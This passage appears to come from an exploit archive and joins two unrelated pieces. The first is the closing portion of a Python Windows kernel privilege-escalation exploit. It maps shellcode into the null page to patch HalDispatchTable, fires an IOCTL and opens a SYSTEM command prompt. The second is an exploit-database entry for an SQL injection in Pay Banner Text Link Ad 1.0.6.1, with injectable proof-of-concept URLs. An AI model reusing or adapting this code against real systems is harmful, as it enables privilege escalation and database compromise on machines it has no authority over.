    # create some shellcode that patches the HalDispatchTable[1]
    # 0x000000a2 lies in the null page; see alloc_shellcode()
    if not alloc_shellcode(0x000000a2, 0x1000, base):
        print "(-) cannot allocate shellcode"
        sys.exit(-1)
    # alloc some memory
    # fixed user-mode address for the buffer the IOCTL reads its target from
    in_buffer = 0x41414141
    in_size = 0x1000
    if not alloc(in_buffer, 0x1000):
        print "(-) cannot allocate target buffer"
        sys.exit(-1)
    if we_can_elevate(h, in_buffer, base):
        os.system('cmd.exe')
    else:
        print "(-) exploit failed!"
# Script entry point; see main() for the Windows 7 x86 precondition.
if __name__ == '__main__':
    main()
# # # # #
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows users to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?action=stats&id=[SQL]
#
# http://localhost/[PATH]/index.php?action=previewad&id=[SQL]
#
# Etc..
# # # # #